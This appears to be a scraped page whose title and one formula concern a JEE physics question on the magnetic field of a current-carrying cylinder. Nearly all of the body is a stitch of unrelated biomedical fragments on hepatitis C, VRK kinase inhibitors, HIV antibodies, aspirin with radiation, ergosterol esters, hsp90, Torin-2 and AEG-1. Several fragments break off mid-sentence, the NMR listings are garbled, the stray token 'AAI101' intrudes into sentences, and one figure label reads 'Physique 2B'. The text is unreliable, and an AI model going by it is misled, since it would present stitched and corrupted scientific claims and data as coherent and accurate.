Choose the correct representation of magnetic field (B) as a function of radial distance (r) from the axis of cylinder. | <urn:uuid:f067ee6a-9eaf-4e9e-ba9a-12776ffbc7a4> | CC-MAIN-2023-14 | https://questions.examside.com/past-years/jee/question/pthe-space-inside-a-straight-current-carrying-solenoid-is-jee-main-physics-motion-ojpbdbqjecdfined | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949598.87/warc/CC-MAIN-20230331082653-20230331112653-00605.warc.gz | en | 0.92452 | 222 | 3.5625 | 4 |
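For reference, Ampère's law for a uniform surface current on a hollow cylinder gives

$$B(r) = \begin{cases} 0, & r < R \\ \dfrac{\mu_0 I}{2\pi r}, & r \ge R \end{cases}$$

so the field is zero inside, jumps at the surface, and falls off as $$1/r$$ outside.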
The red pulp is infiltrated with small lymphocytes and ill-defined nodules of larger cells (Figure 10). Chronic hepatitis C occurs in 80% of cases and can result in cirrhosis and hepatocellular carcinoma. Extrahepatic manifestations (EHMs) of hepatitis C virus (HCV) infection were first reported in the early 1990s and can affect a number of organ systems with significant morbidity and mortality. 40 to 75% of patients with chronic HCV infection display at least one clinical EHM [4, 5]. HCV infection is generally characterized by an indolent clinical course that is influenced by a number of host, viral, and environmental factors. While HCV may infect other cells beyond the liver, most EHMs are thought to be secondary to the host immune response to the viral infection and not a direct viral cytopathic effect [7, 8]. The natural history of HCV infection and its association with EHMs is partially understood. Some EHMs, such as mixed cryoglobulinemia, have been strongly associated with hepatitis C both clinically and pathologically, while other EHMs may be associated with HCV based on higher prevalence, response to antiviral treatment, or anecdotal observation. 2. Mechanisms While direct infection of extrahepatic tissue cells by HCV has been documented, the majority of EHMs are thought to be secondary to immune-mediated mechanisms, either autoimmune or lymphoproliferative in nature. HCV infection leads to upregulation of the humoral immune system in patients with chronic disease, which leads to increases in polyclonal and monoclonal autoantibodies via chronic antigenic stimulation. It has been postulated that anti-HCV-IgG and HCV lipoprotein complexes may act as B-cell superantigens, inducing the synthesis of non-HCV-reactive IgM with rheumatoid factor-like activity.
These autoantibodies, in turn, form immune complexes, which circulate through the body and are deposited in small to medium blood vessels, resulting in complement activation and extrahepatic injury [7–9]. 3. Mixed Cryoglobulinemia HCV is associated with essential mixed cryoglobulinemia (MC), also known as type II cryoglobulinemia. MC is the best documented extrahepatic manifestation of chronic HCV infection and is found in over half of patients [10–13]. Of these, 10% are symptomatic [13, 14]. Cryoglobulins are circulating immunoglobulins that precipitate in the cold and resolubilize when warmed. In type II cryoglobulinemia, the cryoglobulins are composed of several classes of different immunoglobulins, of which one is a monoclonal IgM component with rheumatoid factor-like activity. Expansion of rheumatoid factor-synthesizing B cells represents the biological hallmark of MC. Many organs, including the skin, gastrointestinal tract, and kidney, may be involved. The classic triad of symptoms in patients with HCV-associated MC is palpable purpura, weakness, and arthralgia. 3.1. Palpable Purpura/Leukocytoclastic Vasculitis Cutaneous vasculitis of HCV-related MC, resulting in palpable purpura, is reported in 24–30% of cryoglobulin-positive patients [4, 17]. It is secondary to small- and/or medium-vessel vasculitis with deposition of immune complexes in the small- and medium-sized dermal vessels. It occurs intermittently, preferentially during the winter months, and is nonpruritic. It characteristically begins with involvement of the lower limbs and moves cranially toward the abdomen, less frequently involving the trunk and upper limbs. The face is usually spared. The purpura is papular or petechial and persists for 3–10 days with residual brown pigmentation. In addition, Raynaud syndrome and acrocyanosis are found in 25–34% of patients.
Cutaneous biopsy shows a nonspecific mixed inflammatory infiltrate (leukocytoclastic vasculitis) involving small vessels (Figure 1). Mononuclear cells may be seen within the walls of the vessels, and, in some cases, endovascular thrombi and fibrinoid necrosis of the arteriolar walls may be seen (Figure 2). Figure 1: Leukocytoclastic vasculitis: predominantly lymphocytic mixed inflammatory infiltrate involving small vessels in the dermis (hematoxylin-eosin, original magnification 200). Figure 2: Leukocytoclastic vasculitis: fibrinoid necrosis of dermal vessels (hematoxylin-eosin, original magnification.
We thank the staff at the Northeastern Collaborative Access Team beamlines (GU56413 and GU54127), which are funded by the National Institute of General Medical Sciences of the National Institutes of Health (P41 GM103403). Both VRKs were identified from the structure–activity relationship combined with the crystallographic evaluation of key compounds. We expect our results to serve as a starting point for the design of more potent and specific inhibitors against each of the two VRKs. – Fc) contoured at 1.0. As expected, 5 and 18 were found in the ATP-binding sites of VRK1 and VRK2, respectively (Figure 3A,B). The binding pose for 18 showed that the 2-amino moiety pointed toward the back of the VRK2 ATP-binding site. The 2-amino group and the pyridine N atom of 18 established one hydrogen bond each to the carbonyl and amide groups of VRK2 hinge residues Glu122 and Leu124, respectively. In VRK1-KD crystals, the ligand could be observed in three of the four protein molecules in the asymmetric unit and, remarkably, was found in two different poses. The first of these was equivalent to the one observed for 18 bound to VRK2-KD. In the second binding mode, the 2-amino group of 5 pointed toward the solvent and, together with the pyridine nitrogen atom, facilitated HBs with main-chain atoms from VRK1-KD hinge residue Phe134. The cocrystal structures helped us to rationalize the relevance of the difluorophenol moiety for binding. Regardless of compound binding pose, this group facilitated a HB network with polar side chains from structurally conserved residues within the kinase domain of VRK1 (Lys71 and Glu83) and VRK2 (Lys61 and Glu73). The difluorophenol group participating in these contacts displayed distinct dihedral angles to the 2-amino core depending on its attachment position: 45 in R1 and 9 in R2.
In VRK1, these different orientations of the difluorophenol group were accommodated by a corresponding movement of the side chain of residue Met131, which occupies the gatekeeper position in this protein. Consequently, the difluorophenol group fitted tightly between the C-helix and the gatekeeper residue in both poses. These observations might explain why we could not find substituents that improved binding on the difluorophenol group. The VRK2-KD cocrystal structure also revealed that the 18 sulfonamide group pointed away from the protein ATP-binding site and was mostly solvent-exposed. A similar observation was made for the difluorophenol group in 5, which did not interact with the VRK1-KD C-helix (Supplementary Figure S5D–F). Our DSF results also indicated that placement of polar groups in the meta-position resulted in slight increases of Tm, especially for VRK2-KD (10 vs 11, for example). At this position, polar groups from the ligand might be able to engage polar groups from the VRK2-KD P-loop. Regardless of the ligand binding pose, the P-loop of VRK1 was found to be folded over 5. This conformation was likely stabilized by hydrophobic interactions observed between P-loop residue Phe48 and 5's three-ring system. By contrast, the VRK2 P-loop did not fold over 18. In our VRK2 cocrystal, the P-loop was found rotated toward the protein C-helix by 6 Å (Supplementary Figure S5C). Consequently, equivalent aromatic residues within the P-loop of VRK1 (Phe48) and VRK2 (Phe40) occupied different positions in each of the proteins' ATP-binding sites. The two binding modes observed for 5 in VRK1 suggested that the 2-amino moiety had no binding preference for either of the hinge carbonyl groups it can interact with (Figure 3A,B). This led us to hypothesize that these two interactions were either equally productive or equally weak in the binding process.
To address these hypotheses, we synthesized the following analogues: (i) 23, with two amino groups that could interact with both hinge carbonyl groups simultaneously; (ii) 24, with a 2-amino and a space-filling 6-methyl group; (iii) 25, with the 2-amino group removed; and (iv) 26, with the 2-amino group substituted by a 2-methyl group (Table 1, Supplementary Table S1). DSF assays revealed that none of these new analogs had improved Tm values for VRK2-KD (Table 1, Supplementary Table S1). These results suggested that the HB between the hinge carbonyl group and the 2-aminopyridine core is a productive interaction for VRK2. Also, for VRK1-FL, compounds 23, 24, and 25 did not improve Tm values over those observed for 5. The poor results observed for 23 and 24 might be explained by clashes between one of the two substituents in these compounds (at the 2- or 6-position of the pyridine core) and main-chain atoms from residues within the kinase hinge region. By contrast, 26 and 5 were equipotent in the DSF assay, supporting the hypothesis that the 2-amino moiety contributed little to the binding of 5. All authors have given approval to the final version of the manuscript. This work was supported by the Brazilian agencies FAPESP (Fundação de Amparo à Pesquisa do Estado de São Paulo) (2013/50724-5 and 2014/5087-0), Embrapii (Empresa Brasileira de Pesquisa e Inovação Industrial), and CNPq (Conselho Nacional de Desenvolvimento Científico e Tecnológico) (465651/2014-3 and 400906/2014-7).
The unusual demands on germline reactivity and antibody evolution would counteract – but apparently not preclude – the elicitation of potent bNAbs. The structure of a near-native soluble HIV-1 envelope glycoprotein (Env) trimer in complex with different bNAbs was determined to almost atomic-scale resolution by cryo-electron microscopy and crystallography (1, 2). Native, functional Env trimers on the surface of virions are the only relevant targets for NAbs. And all antibodies that reach a certain occupancy on functional trimers will neutralize viral infectivity. But the virus has evolved a number of defenses against the induction and binding of NAbs, particularly those directed to the less variable regions: extensive N-linked glycosylation, variable loops (V1-V5), quaternary interactions, and conformational flexibility shield conserved epitopes. However, the epitopes of many broadly neutralizing antibodies (bNAbs) involve residues in variable regions (V1-5) as well as glycans (3–6). Four clusters of bNAb epitopes have emerged so far: the CD4-binding site, the V2 loop with its glycans, the V3 and V4 bases with associated glycans, and the membrane-proximal external region (MPER) in gp41 (3–5). Why don't antibody responses to recombinant Env hone in on these epitopes? A problem with such Env immunogens is that they differ from functional Env; and many non-neutralization epitopes are exposed only on nonfunctional forms of Env, such as precursors, which are uncleaved between gp120 and gp41, disassembled oligomers, and denatured or degraded Env (5, 7). The non-neutralization epitopes are often strongly immunogenic both in vaccination and infection and may therefore act as decoys, diverting from neutralizing responses (3, 4). Germline reactivity of Env? There are further hurdles to bNAb elicitation. Poor reactivity of Env with the germline ancestors of bNAbs may be one.
Antibody specificity arises from the blending of germline diversity in immunoglobulin genes with somatic recombination and mutations in variable regions (3, 4). But germline antibodies differ in their propensity to develop into HIV-1 bNAbs: e.g., the most potent CD4bs-directed bNAbs (such as NIH45-46 and 3BNC117) have the gene segment of the germline variable heavy chain VH1-2 or VH1-46 in common. The structural features of these VH variants favor mimicry of CD4 (4, 8). Recombinant Env proteins often do not bind germline versions of known bNAbs (3, 4, 9–15). Several potential explanations may account for such a deficit in reactivity. The forms of Env used as probes may be structurally deficient: whether cleaved, stabilized trimers that better mimic native Env spikes also fail to bind to unmutated ancestors of bNAbs deserves to be systematically investigated. Furthermore, the genetic make-up of the Env tested may not sufficiently match that of the original Env stimulus. Or, alternatively, something other than Env started the selection process, and along the way Env reactivity arose. In this regard, it is notable that bNAbs are more often poly-reactive than are normal antibodies (3, 4, 16), although many bNAbs are not (6); and polyreactivity is probably augmented during HIV-1 infection. Determinants of germline-reverted antibody binding to Env are actively dissected with the aid of computational methods for inferring unmutated common ancestors (3, 13). Indeed, some Env constructs, such as the outer domain of gp120, glycosylation mutants, V1V2 glycopeptides, multimerized forms, and founder-virus variants, do react with germline antibodies (3, 10–12, 14, 17, 18). Unusual affinity maturation. After specific uptake of antigen and encounters with cognate T-helper cells, naïve B-cells enter germinal centers of secondary lymphoid organs where they proliferate, diversify, and express antigen-binding B-cell receptors.
The better the B-cell receptors bind, the more antigen the B cells internalize and present, thereby receiving reinforcing stimuli from follicular T-helper cells (19). But the affinity boost has a ceiling set by diffusion and endocytosis rates, and therefore B-cells usually exit the germinal center after ~10 mutations in the VH. Human IgG has on average only 10–20 such mutations, but strain-specific HIV-1 NAbs have twice as many, and bNAbs ~80. This degree of somatic hyper-mutation (SHM) would arise from iterated germinal-center cycles, in which viral escape mutants with reduced affinity continually trigger affinity restoration: SHM, potency, and breadth are all correlated (17). Apart from deletions and insertions in the complementarity-determining regions (CDRs), which are rare in regular antibodies (3, 4), bNAbs display mutations even.
As shown in Figure 2B and Figure S8, cox2 knockdown sensitized A549 cells at 24 and 48 hr post-irradiation, as cell viability was significantly reduced compared to untreated cells. ... of chromatin looping was mediated by the inhibition of nuclear translocation of p65 and decreased enrichment of p65 at ... rendered A549 cells sensitive to γ-rays via the induction of apoptosis. In conclusion, we present evidence of an effective therapeutic treatment targeting the epigenetic regulation of lung cancer and a potential strategy to overcome radiation resistance in cancer cells. ... was detected in colorectal,13 prostate,14 lung,15 breast,16 and other cancers. Additional studies showed that elevated expression in tumors was associated with increased angiogenesis, tumor invasion, and resistance to radiation-induced apoptosis.17 However, the mechanisms by which cytoprotection is exerted are not completely understood.18 Gene expression is regulated by the combined action of multiple enhancer and promoter regions.25 Therefore, the regulation of the chromosomal conformation of the locus might be targeted for cancer treatment. Studies have shown that some chemotherapeutic agents induce expression of apoptosis-related genes by regulating chromosomal conformation. For example, camptothecin was shown to directly diminish chromatin looping and induce apoptosis.26 Because of its anti-tumor effects, aspirin has recently drawn interest as a novel chemotherapeutic drug.27 The molecular mechanism of aspirin was previously shown to involve inhibition of cox2 activity, thereby preventing the production of prostaglandins.28 In the present study, we used normal and lung cancer cells to study the combinatorial therapeutic effects of radiation and aspirin and the underlying mechanism.
We confirmed that pre-treatment with aspirin at sublethal doses significantly sensitized NSCLC cells to radiation but showed weaker sensitization effects on normal human lung fibroblasts (NHLFs) and human colon cancer cells (HCT116). Using 3C analysis, we showed that aspirin disrupted the chromosomal architecture of the locus by inhibiting p65 nuclear translocation, which improved the efficacy of radiation treatment and induced cell apoptosis. This study proposed a novel therapeutic approach of combining aspirin with radiation to treat lung cancer and deciphered the mechanism of cox2 suppression by aspirin. Results. The Role of cox2 Expression in the Radiosensitivity of Lung Cancer Cells. To overcome radiation resistance in cancer cells, combination therapy with chemotherapeutic agents has been demonstrated to be effective in many different human malignancies.29 Aspirin, an anti-inflammatory drug, enhanced cell death in human prostate and colon cancer.30, 31 Before we carried out the combination study, aspirin (0, 0.5, 1, 2, and 5 mM) and radiation (0, 1, 2, 5, and 8 Gy) were tested, respectively, for their toxicity (Figures S1 and S2), and 1 mM aspirin, with minimal toxicity, and 5 Gy γ-rays, which is normally used to treat lung cancer cells in clinical experiments,32 were finally selected for further study. To examine whether aspirin enhanced the radiosensitivity of lung cancer cells, cell survival was determined by colony formation assay for A549 cells. As shown in Figure 1A, cells treated with a combination of aspirin and radiation exhibited significantly reduced survival following treatment, compared to cells treated with radiation alone. Similarly, pre-treatment with aspirin in other NSCLC cells (H1299 cells) also resulted in significant radiosensitization (Figure S3).
Furthermore, because of the difficulty of colony formation for NHLF cells, we compared the difference in radiosensitivity between lung cancer cells (A549) and NHLF cells, using apoptosis and cell viability as endpoints, by fluorescence-activated cell sorting (FACS) and 3-(4,5-dimethyl-2-thiazolyl)-2,5-diphenyl-2-H-tetrazolium bromide (MTT) assay. Our results showed that, compared with NHLF cells, A549 cells pre-treated with aspirin were more sensitive to radiation, exhibiting higher levels of apoptosis (Figures 1B and 1C) and a significant reduction of cell viability at 24 and 48 hr post-irradiation (Figure 1D; Figure S4). To further determine whether aspirin radiosensitized other cancer cells, HCT116 human colon cancer cells were selected and treated with a combination therapy of aspirin and radiation to validate its efficacy in other malignancies, but a weaker sensitization effect was found (Figure S5). Together, our data demonstrated that combination treatment of aspirin and radiation was more effective in targeting lung cancer cells than either single treatment. Moreover, the combination treatment was not very toxic to normal lung cells and colon cancer cells, suggesting that the combination therapy might be specific to lung cancer. Figure 1: Cytotoxicity of Combination Treatment of.
Particularly, a possible role of mitochondrial function, including biosynthesis, bioenergetics, and signaling, should be considered in mediating the sex differences in psychiatric disorders. antidepressant effects. Moreover, one derivative of Er, ergosteryl 2-naphthoate (ErN), exhibited stronger antidepressant activity in vivo compared to Er. Acute administration of ErN (5 mg/kg, i.p.) and a combination of ErN (0.5 mg/kg, i.p.), reboxetine (2.5 mg/kg, i.p.), and tianeptine (15 mg/kg, i.p.) reduced the immobility time in the FST. Pretreatment with bicuculline (a competitive γ-aminobutyric acid (GABA) antagonist, 4 mg/kg, i.p.) and during the experimental period. After one week of acclimatization, all mice were randomly divided into different groups (n = 10). 2.2. Synthesis of Compounds. To a solution of 2-naphthoic acid (0.3 mmol) and EDCI (0.4 mmol) in 5 mL dichloromethane, stirred for 10 minutes, we added a solution of 0.2 mmol of Er and DMAP (0.2 mmol) in 5 mL dichloromethane. After the solution was heated to reflux for 8 h, the precipitate was removed by filtration, and the solvent was removed under reduced pressure. The residue was purified by silica gel chromatography and eluted with petroleum ether/ethyl acetate (5:1, for 5 min at 4 °C. The supernatants were collected for the detection of GABA and Glu by an RP-HPLC method. The samples underwent pre-column derivatization with 2,4-dinitrofluorobenzene (DNFB). The content was calculated by the external standard method. HPLC analysis was carried out on a Shimadzu LC2010A series HPLC system (Shimadzu, Kyoto, Japan). An Agilent C18 column (200 mm × 4.6 mm, i.d., 5 μm) was used for all separations at a column temperature of 35 °C. The binary gradient elution system consisted of 0.05 mol/L sodium acetate buffer (pH 6.0, A) and acetonitrile/water (1:1, multiple comparison test. A value of p < 0.05 was considered statistically significant. 3. Results 3.1.
Synthesis and Structural Identification. The Er esterification derivatives (shown in Figure 1) were obtained via the reaction of Er with organic acids in dichloromethane at a temperature of 70 °C by way of reflux. Because water produced during the reaction slows down or even stops the reaction, we carried out the reversible process with two molar ratios of EDCI to avoid side reactions. DMAP was used as a catalyst. The products were isolated using a silica gel column. Two methods (FTIR and NMR) were used to identify the molecular structures of the synthesized Er esters. The IR absorption spectrum of Er shows an absorption at 1710.7 cm−1, which arises from the C=O stretch, and the absorption bands at 3342.0–3401.7 cm−1 indicate the existence of -O-H (-O-H stretch). For all Er esters, absorption was observed at 1674–1730 cm−1 (C=O stretch in the acyl group moiety), indicating the introduction of an acyl group. The molecular structures of the synthesized products were identified by individual NMR analysis, and the characteristic chemical shifts were detailed as follows.
In 1H-NMR spectrum of all Er esters, the signal at 3.0C6.0 (= 1.5, 8.7 Hz, 8-H), 7.973 (= 1.2, 8.7 Hz, 5-H), 7.890 (= 8.7 Hz, 3,4-H), 7.611 (= 1.2, 8.7, 14.4 Hz, 6-H), 7.588 (= 1.5, 8.7, 14.4 Hz, 7-H), 5.649 (= 4.2, 7.2 Hz, 22-H), 5.221 (= 4.2, AAI101 7.2 Hz, 23-H), 5.043 (= 6.6 Hz, 21-H), 1.031 (s, 3H, 18-H), 0.956 (= 6.6 Hz, 28-H), 0.877 (= 6.9 Hz, 26-H), 0.862 (= 6.6 Hz, 27-H), 0.657 (= 0.9, 1.8 Hz, 5-H), 7.111 (= 0.9, 3.6 Hz, 3-H), 6.441 (= 1.8, 3.6 Hz, 4-H), 5.542 (= 4.2, 7.2 Hz, 22-H), 5.137 (= 4.2, 7.2 Hz, 23-H), 4.883 (= 6.6 Hz, 21-CH3), 0.916 (= 6.9 Hz, 28-H), 0.781 (= 6.9 Hz, 26-H), 0.766 (= 6.9 Hz, 27-H), 0.565 (= 1.5, 7.8 Hz, 6-H), 7.477 (= 1.8, 7.8 Hz, 4-H), 6.990 (= 7.8 Hz, 3-H), 6.904 (= 0.9, 7.8 Hz, 5-H), 5.637 (= 4.2, 7.2 Hz, 22-H), 5.140 (= 4.2, 7.2 Hz, 23-H), 5.029 (= 6.6 Hz, 21-CH3), 1.009 (= 6.9Hz, 28-H), 0.860 (= 6.6 Hz, 26-H), 0.845 (= 6.6 Hz, 27-H), 0.649 (= 10 in each group), compared with the control group, * 0.05, ** 0.01. One way ANOVA, Tukey test. 3.3. The Effective and Sub-Effective Doses of ErN in the FST Physique 2B shows that ErN (5 mg/kg, i.p.) (F(1,18) = 22.57, 0.01) significantly reduced the immobility time in the FST compared with other dose groups, and the dosage of 0.5 mg/kg could AAI101 not reduce the immobility time compared with that of the control group. Therefore, 5 mg/kg AAI101 and 0.5 mg/kg were chosen as the effective dose and sub-effective dose, respectively. 3.4. The Antidepressant Effect of Co-Administration of the Sub-Effective Doses of ErN (0.5.
Unlike in Grp94, however, access to Site 2 in Hsp90 is blocked by the side chain of Phe138, the equivalent of Grp94 Phe199. The origins of the swinging motion of Phe199 in Grp94 that exposes Site 2 for 8-aryl group occupancy are not yet fully understood. and are competitive inhibitors of ATP binding. Thus, they block chaperone action by preventing the conformational rearrangements that lead to chaperone activity. Although the ATP hydrolysis cycle of hsp90s requires contributions from all three hsp90 domains, the structural basis for inhibitor affinity can be understood from studying the N-terminal domain in isolation [25, 40, 41]. In large part this is due to the fact that all of the conformational rearrangements that lead to the active state of the chaperone, including lid closure and N-terminal domain dimerization, occur after ATP binding. Inhibitor binding therefore reduces to a problem of competing with ATP for the binding pocket, which is located entirely within the N-terminal domain. This circumstance has proven to be experimentally fortuitous because the N-terminal domains of hsp90s have generally been amenable to crystallization. Thus, while the structure of an inhibited complex of any intact hsp90 chaperone has yet to be reported, over 300 crystal structures of N-terminal domain:ligand complexes have been determined. Interestingly, while structure determinations of hsp90:ligand complexes have used the N-terminal domain, the main biochemical assay for measuring inhibitor binding is a fluorescence polarization displacement assay that utilizes the intact hsp90 chaperone for maximal signal to noise.
The fact that the structure determination and assay methods, which were optimized using different chaperone constructs, are nonetheless experimentally congruent accounts for much of the continuing progress of the hsp90 inhibitor development field. The success of Geldanamycin in defining the client pool of Hsp90, and the subsequent realization that inhibition of Hsp90 had the potential to be therapeutically useful, has led to an explosion of efforts to develop high-affinity inhibitor compounds that bind to the N-terminal domain. Compounds based on no fewer than 19 different scaffolds that target the ATP binding pocket are undergoing clinical trials. Despite the success in identifying novel scaffolds for Hsp90 inhibition, two significant problems remain. First, the current generation of inhibitors now in clinical trials targets all paralogs. These pan-hsp90 inhibitors are of limited use, however, in deconvoluting the biological role of any one paralog. If inhibitors that targeted a single paralog could be developed, it is clear from the experience with Geldanamycin that our understanding of the role of each chaperone in the cell would be considerably advanced. Second, as might be anticipated for inhibitory strategies that indiscriminately target a broad range of client proteins, enthusiasm for the clinical utility of the current set of hsp90 inhibitors has been tempered by the observation of adverse side effects associated with treatment [39, 43]. These include hepatotoxicity, hyponatremia, hypoglycemia, fatigue, diarrhea, general toxicities associated with DMSO formulations, and the upregulation of compensatory chaperone pathways such as Hsp70.
Since it is axiomatic that the first route to minimizing side effects is improved targeting selectivity, a significant challenge is to develop compounds that target a single hsp90 paralog only. While the basic idea of targeting individual hsp90 paralogs with selective inhibitors is attractive in principle, in practice the high sequence and structural homology of the individual members of the hsp90 family would appear to make them poor candidates for this approach. Within their N-terminal domains, the four cellular paralogs exhibit sequence identities of 50% or more (Figure 4). Even worse, the amino acids that line the ATP/ligand binding pocket are over 70% identical, with 21 of 29 residues completely conserved and the remaining 8 highly conserved. Despite these daunting prospects, however, paralog-selective inhibitors have been developed. The key to these advances, as will be discussed in the following sections, has been the identification and exploitation of three pockets, termed Site 1, Site 2, and Site 3, that form a halo of potential selectivity immediately adjacent to the ATP binding cavity (Figure 6D). These pockets form pairwise compound binding sites, with the central ATP binding cavity serving as the common partner. The ability of a ligand to efficiently access and stably bind these compound sites in large part accounts for selective paralog binding. Figure 4: Alignment of human Hsp90α, Hsp90β, Grp94, and Trap-1 N-terminal domains. Identical residues are shaded black, homologies are shaded gray. Residues comprising Sites 1, 2, and 3 are indicated by numbered squares above the residues. The main ATP binding pocket is indicated by squares labeled with the letter C.
Figure 6: N-terminal domain structures displaying ligand binding sites and an overlay of binding-site residues from individual paralogs. A) Grp94 in.
Torin-2 alone suppressed feedback activation of PI3K/Akt, whereas the mTORC1 inhibitor RAD001 required the addition of the Akt inhibitor MK-2206 to achieve the same effect. These pharmacological strategies targeting PI3K/Akt/mTOR at different points of the signaling cascade might represent a new, promising therapeutic strategy for the treatment of B-pre ALL patients. Keywords: B-pre acute lymphoblastic leukemia, Torin-2, mTOR, targeted therapy, Akt. INTRODUCTION. mTOR is a highly conserved and widely expressed serine/threonine kinase that is a member of the phosphatidylinositol-3 kinase-like kinase (PIKK) family, which also includes other protein kinases that regulate DNA damage responses, such as ATM (ataxia telangiectasia-mutated kinase) and ATR (ATM- and Rad3-related kinase) [1, 2]. mTOR plays a pivotal role in the PI3K/Akt/mTOR signaling pathway, which senses growth factors and serves as a central regulator of fundamental cellular processes such as cell growth/apoptosis, autophagy, translation, and metabolism [3, 4]. Activation of PI3K recruits cellular protein kinases that in turn activate downstream kinases, including the serine/threonine kinase Akt. Phosphorylation of Akt activates mTOR complex 1 (mTORC1) and induces subsequent phosphorylation of S6K and of the eukaryotic translation initiation factor 4E-binding protein 1 (4E-BP1). The activation of mTORC1 results in increased translation and protein synthesis. A second complex of mTOR, known as mTORC2, has been described more recently and appears to act in a feedback loop via Akt. Gene deletions/mutations and functional impairment of many proteins involved in this signaling pathway lead to a deregulation that results in different human cancers, including hematological malignancies.
Furthermore, hyperactivation of this pathway through loss of negative regulators, such as PTEN, or mutational activation of receptor tyrosine kinases upstream of phosphoinositide 3-kinase (PI3K) is a frequent occurrence in leukemia patients, where it negatively influences response to therapeutic treatments. Acute lymphoblastic leukemia (ALL) is the most common pediatric malignancy, and B-precursor acute lymphoblastic leukemia (B-pre ALL) is the most frequent pediatric ALL subtype, characterized by an aggressive neoplastic disorder of early lymphoid precursor cells [8, 9]. The treatment protocol for B-pre ALL includes an intense chemotherapy regimen with cure rates of 15–80% [10, 11]. In B-pre ALL, many research efforts are currently devoted to the development of targeted therapies to limit the side effects of chemotherapy and to increase treatment efficacy for poor-prognosis patients, i.e. those with poor outcome following relapse [12, 13]. PI3K/Akt/mTOR pathway activation is a frequent feature in B-pre ALL, and therefore this pathway is an attractive target to efficiently treat this disease. A new class of ATP-competitive mTOR inhibitors, such as Torin-2, has been shown to potently target mTORC1 and mTORC2. Torin-2 is also a potent inhibitor of ATR, ATM, and DNA-PK. This compound exhibits an anti-tumour activity more broad-based and profound compared to the rapalogs, which do not fully inhibit mTORC1 and are unable to inhibit mTORC2. We therefore hypothesized that dual inhibition of mTORC1 and mTORC2 by Torin-2 would provide a superior outcome in B-pre ALL as compared to inhibition of mTORC1 obtained with RAD001. We tested the cytotoxic activity of Torin-2 and its capability to prevent Akt reactivation after mTORC1 and mTORC2 inhibition. Furthermore, we explored whether dual targeting of mTORC1 and Akt, with RAD001 and MK-2206 respectively, might achieve results similar to those obtained with Torin-2 alone.
Torin-2 displayed powerful cytotoxic activity with an IC50 in the nanomolar range, induced G0/G1 phase cell cycle arrest, modulated the PI3K/Akt/mTOR pathway, and caused apoptosis and autophagy in a dose-dependent manner. Interestingly, feedback activation of PI3K/Akt was suppressed by Torin-2 alone, whereas RAD001 required the addition of MK-2206 to achieve the same efficacy. These findings indicate that mTORC1 and mTORC2 inhibition could be an attractive strategy to develop innovative therapeutic protocols for the treatment of B-pre ALL patients and to prevent Akt reactivation after mTORC1 targeting. RESULTS PI3K/Akt/mTOR.
As shown in Figure 1B, the level of AEG-1 was distinctly higher in ccRCC tissues than in the surrounding normal tissues. The underlying mechanism by which AEG-1 facilitates the metastasis of ccRCC cells has not yet been explored. In this study we demonstrated that AEG-1 plays vital roles in growth and metastasis of ccRCC Caki-2 cells and normal tissue showed that AEG-1 was significantly overexpressed in the Jones Renal ccRCC dataset and the Gumz Renal ccRCC dataset. Cell proliferation and colony formation assay: Cell proliferation was detected by MTS assay (Promega, Madison, WI, USA). First, Caki-2 cells were cultured in 96-well plates. After incubation for 1, 2, 3, or 4 days, 20 μl of MTS solution was added to the 96-well plates and the cells were incubated for 4 h. Finally, the absorbance was assessed at 490 nm. For colony formation analysis, cells (1000) were seeded into 6-well plates. After being cultured for a total of 3 weeks, cell colonies were stained using crystal violet (0.1%) and counted. Plasmids and transfections: Short hairpin small interfering RNA (shRNA) specifically targeting AEG-1 was purchased from Santa Cruz (Santa Cruz, CA, USA). The AEG-1 expression construct was produced by sub-cloning PCR-amplified full-length human AEG-1 cDNA into the pMSCV retrovirus plasmid. The pCLEN-Notch1 plasmid (#17704, Addgene, Cambridge, MA, USA) was deposited by Dr. Nicholas Gaiano. Transfection of shRNA or plasmid was conducted using Lipofectamine 2000 (Invitrogen, Carlsbad, CA, USA). Immunoblotting: Total proteins were extracted using lysis buffer. We resolved 25 μg of protein by 8% SDS-PAGE and transferred it to a PVDF membrane (Millipore, USA). After blocking with blocking buffer, PVDF membranes were incubated with primary antibodies. After washing with TBST, PVDF membranes were incubated with horseradish peroxidase (HRP) secondary antibody. Signals were assessed using the ECL system (Millipore, Braunschweig, Germany).
Wound-healing and invasion assay: Cells were cultured in 6-well plates to form a confluent monolayer. A wound was scratched using a 100-μl pipette tip. The gap was photographed at 0 h and 24 h. The invasion of Caki-2 cells was detected using a BioCoat Matrigel-coated Invasion Chamber (8.0-μm membrane, BD Biosciences, USA). We placed 1×10^5 Caki-2 cells into the upper chamber, and 600 μl DMEM containing 25% serum was added to the lower chamber as a chemo-attractant. After 6 h, the Caki-2 cells that had invaded to the lower surface of the membrane were stained with crystal violet (0.1%) and counted in 5 randomly selected fields. Immunofluorescence: Cells on a glass coverslip were permeabilized using Triton X-100 and then incubated with 1% BSA in PBS to block nonspecific binding. Then, Caki-2 cells were incubated with rabbit anti-AEG-1 antibody. The cells were washed with PBS 3 times and then incubated with goat anti-rabbit FITC secondary antibody (1:100, Boster Biological Technology, Wuhan, China). Cell nuclei were stained using DAPI (Boster Biological Technology). Experimental pulmonary metastasis model: BALB/c nude mice were bought from Shanghai Slack Laboratory Animal Co., Ltd. (Shanghai, China). The parental Caki-2 cells, AEG-1 OE cells, or Caki-2 cells transfected with AEG-1 shRNA plasmids were injected into nude mice via the tail vein. All nude mice were sacrificed after 4 weeks, and lung tissue was fixed using 10% formalin and subjected to hematoxylin and eosin (H&E) staining. Quantitative real-time PCR (qRT-PCR): RNA was extracted using the RNeasy kit (Qiagen). We performed qRT-PCR using 1 μg RNA with the QuantiTect Reverse Transcription kit (Qiagen). The primers were as follows: GAPDH: Forward: 5'-TGGATTTGGACGCATTGGTC-3', Reverse: 5'-TTTGCACTGGTACGTGTTGAT-3'; AEG-1: Forward: 5'-AAATGGGCGGACTGTTGAAGT-3', Reverse: 5'-CTGTTTTGCACTGCTTTAGCAT-3'; Notch1: Forward: 5'-CCCTTGCTCTGCCTAACGC-3', Reverse: 5'-GGAGTCCTGGCATCGTTGG-3'.
The comparative cycle threshold (Ct) method was used to quantify expression levels, calculated using the 2^(−ΔΔCt) method. Xenografts: The nude mice were assigned to the following 2 groups: AEG-1 shRNA and shCon (control group). Then, 100 μl of Caki-2 (AEG-1 shRNA/control-shRNA) cell suspension containing 1×10^6 cells was subcutaneously inoculated into nude mice. Tumor sizes were measured once a week. Five weeks later, the mice were sacrificed and the tumors were removed for further IHC staining. Experimental protocols involving animals were approved by the Institutional Animal Care and Use Committee of the First People's Hospital of Jining City in Shandong Province. Statistical analysis: The data are presented as mean ± standard deviation.
